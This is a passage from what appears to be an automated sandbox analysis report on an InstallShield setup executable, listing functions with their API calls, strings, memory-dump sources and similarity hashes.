                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: HsG$HsG$\
                                                                                                                                                                          • API String ID: 2608676048-1273255123
                                                                                                                                                                          • Opcode ID: 94251298066fbc9f332dcbf7bbd72bc663a0c9f12fad28b9406aa35f7a5999b3
                                                                                                                                                                          • Instruction ID: 1a2281ef391b02badb8f6c6782d21d1b03687c718303ea41c398b00632531fae
                                                                                                                                                                          • Opcode Fuzzy Hash: 94251298066fbc9f332dcbf7bbd72bc663a0c9f12fad28b9406aa35f7a5999b3
                                                                                                                                                                          • Instruction Fuzzy Hash: A8417D72804518DADB10EBF4C8969ED7B78BB10348F10412FEC0AA7293EB78594ECB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042D357, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042D35E
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 004114B9: __EH_prolog3_GS.LIBCMT ref: 004114C0
                                                                                                                                                                            • Part of subcall function 00421862: __EH_prolog3_GS.LIBCMT ref: 00421869
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: /n %s$:InstanceId%d.mst$HsG$MSINEWINSTANCE=1
                                                                                                                                                                          • API String ID: 1274762985-2962780309
                                                                                                                                                                          • Opcode ID: cab9408cfb248484796564eec9fc3dec05d0467fc54a22b521ea4ec8279715a9
                                                                                                                                                                          • Instruction ID: 6954da7d79d95b13c51607618fe600fb7f749aa8aa99bc3f5a9ff1ca1cc696f8
                                                                                                                                                                          • Opcode Fuzzy Hash: cab9408cfb248484796564eec9fc3dec05d0467fc54a22b521ea4ec8279715a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A413071D04259EACF14EFE5CC91ADDBBB4BF14308F50406FE505A7181EB786A09CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00425D1F, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00425D29
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00425C00: __EH_prolog3_GS.LIBCMT ref: 00425C07
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000400,?,00000400,?,?,00000000,00000000,ISSetup.dll,?,00000001,000000A8,00427A65,?), ref: 00425DC5
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 0040C5CB: __EH_prolog3_GS.LIBCMT ref: 0040C5D2
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$String$FreeH_prolog3$AllocFileModuleName
                                                                                                                                                                          • String ID: HsG$ISSetup.dll$ISSetup.dll
                                                                                                                                                                          • API String ID: 3766261395-2501284907
                                                                                                                                                                          • Opcode ID: 6fc6fd731e8ece0c01dca442491238d42ded462abafe611b5ec31ad11b805681
                                                                                                                                                                          • Instruction ID: 063de67b3e9ff9d0e20237d2c9be6243cc9a0dd31fc63a947a6a1707d6168d19
                                                                                                                                                                          • Opcode Fuzzy Hash: 6fc6fd731e8ece0c01dca442491238d42ded462abafe611b5ec31ad11b805681
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C419F71900218EEDB11EBA1CC91BEEBB78AF11304F5041AEE542B71D2EB781F09DB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044F6D4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0044F708
                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 0044F736
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000), ref: 0044F764
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000), ref: 0044F79A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3058430110-1835203436
                                                                                                                                                                          • Opcode ID: 45b496ab056d8f72f473a5ee93b9cde7b70d1e038dbc3add78416efc571e6e94
                                                                                                                                                                          • Instruction ID: d2a8dc96114b7d7f4a822cbd08c7d89235cd03a0836e6effe8c14ca43e753225
                                                                                                                                                                          • Opcode Fuzzy Hash: 45b496ab056d8f72f473a5ee93b9cde7b70d1e038dbc3add78416efc571e6e94
                                                                                                                                                                          • Instruction Fuzzy Hash: F131F331600206AFEB21CF75C844BBB7BA9FF41354F26453AE854872A1D338E899DB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040B54D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystem_memset_strstr
                                                                                                                                                                          • String ID: api-ms-win-core-
                                                                                                                                                                          • API String ID: 3657221724-1285793476
                                                                                                                                                                          • Opcode ID: f7126195dca1943588a6c8bac4722d8a4f94509b7cf031c496fe2229c321e5fd
                                                                                                                                                                          • Instruction ID: 83d3fd9e628b2f8d8865071b1e2d6f9067f9adf47cde43992171fd4f4b02c3d1
                                                                                                                                                                          • Opcode Fuzzy Hash: f7126195dca1943588a6c8bac4722d8a4f94509b7cf031c496fe2229c321e5fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A2127718047049EEB20DB249C84BEA7BE4DB15308F1448BBD4D6B32C1D7B9A9C4CB9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404D50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00404DB2
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,?,74B04D40,?,?,?,00471858,000000FF,HsG,00403E24), ref: 00404DDD
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404E2E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-815662401
                                                                                                                                                                          • Opcode ID: f9183055fa258d70398033bd1dd18630fbf538d8dfc564c67f5463bca482adfc
                                                                                                                                                                          • Instruction ID: 9d582c57c52179a9b23215cd3e6947e4845b0f03d18dae1ad6fca86d42b0d534
                                                                                                                                                                          • Opcode Fuzzy Hash: f9183055fa258d70398033bd1dd18630fbf538d8dfc564c67f5463bca482adfc
                                                                                                                                                                          • Instruction Fuzzy Hash: D331BFB1100A01EFD710DF45C984BA6B7F8FF48718F50422EE91997A90DB79F909CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456D56, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00456D5D
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040C487: __EH_prolog3.LIBCMT ref: 0040C48E
                                                                                                                                                                            • Part of subcall function 0040C487: GetLastError.KERNEL32(00000004,0040C71D,00000000,?,00000000,00000004,0040F729,-00000004,?,00000001,?,00000000), ref: 0040C4B0
                                                                                                                                                                            • Part of subcall function 0040C487: SetLastError.KERNEL32(?,00000000,?), ref: 0040C4F1
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$H_prolog3$FreeH_prolog3_$Alloc
                                                                                                                                                                          • String ID: HsG$HsG$HsG$InstalledProductName
                                                                                                                                                                          • API String ID: 808671728-2315314420
                                                                                                                                                                          • Opcode ID: bdcd2d0ba47a381cb16d49d4d3ef5eb5dd1ecb3ed228236aab87a7235c38d0af
                                                                                                                                                                          • Instruction ID: 6c50d195f9c365d330c8cd9bfad8d36924ca448d016042700607c1f278bda57a
                                                                                                                                                                          • Opcode Fuzzy Hash: bdcd2d0ba47a381cb16d49d4d3ef5eb5dd1ecb3ed228236aab87a7235c38d0af
                                                                                                                                                                          • Instruction Fuzzy Hash: BE319270904208DFDB10DFE5C891AEDBBB4BF54308F60802EE805B7182DB785A4DCB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00458C92, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00458C99
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
                                                                                                                                                                            • Part of subcall function 0040C487: __EH_prolog3.LIBCMT ref: 0040C48E
                                                                                                                                                                            • Part of subcall function 0040C487: GetLastError.KERNEL32(00000004,0040C71D,00000000,?,00000000,00000004,0040F729,-00000004,?,00000001,?,00000000), ref: 0040C4B0
                                                                                                                                                                            • Part of subcall function 0040C487: SetLastError.KERNEL32(?,00000000,?), ref: 0040C4F1
                                                                                                                                                                            • Part of subcall function 0040C5CB: __EH_prolog3_GS.LIBCMT ref: 0040C5D2
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00457A89: __EH_prolog3_GS.LIBCMT ref: 00457A93
                                                                                                                                                                            • Part of subcall function 00457A89: _memset.LIBCMT ref: 00457B2C
                                                                                                                                                                            • Part of subcall function 00457A89: CreateProcessW.KERNEL32 ref: 00457BA4
                                                                                                                                                                            • Part of subcall function 00457A89: GetLastError.KERNEL32 ref: 00457BBF
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3$H_prolog3_$FreeString$CreateProcess_memset
                                                                                                                                                                          • String ID: /REGSERVER$ /UNREGSERVER$HsG$open
                                                                                                                                                                          • API String ID: 2413291776-1596474003
                                                                                                                                                                          • Opcode ID: 64102b978f8c3d9065bdee9227943088cd9aad66e8fc8769ddd133c53bac298d
                                                                                                                                                                          • Instruction ID: 1ca64e020523cb4cf8eab23e085ca272878be5ba3c50ec1c1128e6bfff3626c9
                                                                                                                                                                          • Opcode Fuzzy Hash: 64102b978f8c3d9065bdee9227943088cd9aad66e8fc8769ddd133c53bac298d
                                                                                                                                                                          • Instruction Fuzzy Hash: CD21D671E10304EAEB00EBA5C8537ED7BA89F50704F50405EFD04AB2C2D7B94A0987DA
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004050C0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove
                                                                                                                                                                          • String ID: :G@$:G@$HsG
                                                                                                                                                                          • API String ID: 4104443479-2235847568
                                                                                                                                                                          • Opcode ID: 5ff5acbeeac4805a8dd3ed3af7a127052f109d35fa0132a9f2fa85b24df8afe1
                                                                                                                                                                          • Instruction ID: a4e55f3b04ec15174be7f10891f4c303da10bb07fe7f3a4f5d4f1495e19c2a84
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff5acbeeac4805a8dd3ed3af7a127052f109d35fa0132a9f2fa85b24df8afe1
                                                                                                                                                                          • Instruction Fuzzy Hash: 6311B1B76016119BD7209E09F880967F3A4FBA1365720453BE9949B300D336AC95CBF8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00418DB7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00418DBE
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,00000001,0000006C,00427B39,?,00000000,?,00000000), ref: 00418DE7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00418DFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3H_prolog3_LastLibraryLoad
                                                                                                                                                                          • String ID: Failed to load ISSetup.dll$IsMsiHelper.cpp
                                                                                                                                                                          • API String ID: 1370564055-251664514
                                                                                                                                                                          • Opcode ID: b507f8d3578ff315ec5e21c74f6649b32ff260a49ed6a8e085fe0137660c105d
                                                                                                                                                                          • Instruction ID: 29ca2e7c09aacabe980d5a505d9c2b201bbef07a08d2fed9459ba583d544a0c0
                                                                                                                                                                          • Opcode Fuzzy Hash: b507f8d3578ff315ec5e21c74f6649b32ff260a49ed6a8e085fe0137660c105d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3921AE70904244EFDB14EBA4CD49BDE7BB4BB11304F54006EF401A72D2DBB95A88CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004547A5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004547AF
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00454825
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000,0000010C,004588DC,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00454837
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
